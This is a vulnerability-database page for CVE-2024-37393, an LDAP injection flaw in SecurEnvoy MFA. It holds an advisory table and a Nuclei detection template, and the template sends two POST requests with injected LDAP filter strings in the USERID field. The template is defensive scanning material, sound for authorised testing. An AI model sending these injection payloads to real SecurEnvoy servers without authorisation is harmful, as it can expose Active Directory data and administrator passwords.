| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| Exploit for Cleartext Transmission of Sensitive Information in Securenvoy Multi-Factor_Authentication_Solutions | 10 Jun 202412:42 | – | githubexploit | |
| CVE-2024-37393 | 10 Jun 202412:48 | – | circl | |
| SecurEnvoy MFA Security Vulnerability | 10 Jun 202400:00 | – | cnnvd | |
| CVE-2024-37393 | 10 Jun 202400:00 | – | cve | |
| CVE-2024-37393 | 10 Jun 202400:00 | – | cvelist | |
| CVE-2024-37393 | 10 Jun 202420:15 | – | nvd | |
| CVE-2024-37393 | 10 Jun 202420:15 | – | osv | |
| PT-2024-27519 · Securenvoy · Securenvoy Mfa | 10 Jun 202400:00 | – | ptsecurity | |
| CVE-2024-37393 | 23 May 202508:45 | – | redhatcve | |
| VulnCheck KEV: CVE-2024-37393 | 12 Nov 202500:00 | – | vulncheck_kev |
| Source | Link |
|---|---|
| tenable | www.tenable.com/cve/CVE-2024-37393 |
| optistream | www.optistream.io/blogs/tech/securenvoy-cve-2024-37393 |
| securenvoy | www.securenvoy.com/ |
id: CVE-2024-37393
info:
name: SecurEnvoy Two Factor Authentication - LDAP Injection
author: s4e-io
severity: critical
description: |
Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.
impact: |
Unauthenticated attackers can exploit LDAP injection to exfiltrate sensitive Active Directory data including cleartext LAPS passwords.
remediation: |
Update SecurEnvoy MFA to version 9.4.514 or later.
reference:
- https://www.tenable.com/cve/CVE-2024-37393
- https://www.optistream.io/blogs/tech/securenvoy-cve-2024-37393
- https://securenvoy.com
classification:
cve-id: CVE-2024-37393
cwe-id: CWE-89
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
epss-score: 0.03304
epss-percentile: 0.87045
cpe: cpe:2.3:a:securenvoy:multi-factor_authentication_solutions:*:*:*:*:*:*:*:*
metadata:
verified: true
shodan-query: title:"SecurEnvoy"
fofa-query: title="SecurEnvoy"
tags: cve,cve2024,securenvoy,ldap,vuln,vkev
variables:
userid: "{{to_lower(rand_base(20))}}"
http:
- raw:
- |
POST /secserver/? HTTP/1.1
Host: {{Hostname}}
FLAG=DESKTOP
1
STATUS:INIT
USERID:{{userid}})(sAMAccountName=*
MEMBEROF:Domain Users
- |
POST /secserver/? HTTP/1.1
Host: {{Hostname}}
FLAG=DESKTOP
1
STATUS:INIT
USERID:*)(sAMAccountName=*
MEMBEROF:Domain Users
matchers:
- type: dsl
dsl:
- "contains(body_1, 'Error checking Group')"
- "status_code_1 == 200"
- "contains(body_2, 'GETPASSCODE')"
- "status_code_2 == 200"
condition: and
# digest: 490a00463044022041975b2f8f9fe8e4d2559cd7f08684fbbc2c19a2c44431a536cd45d7b0fdd42d0220700bfde6538b10ff0e173739f32b12e9e16de1231205692acb9da627fb54e9ec:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation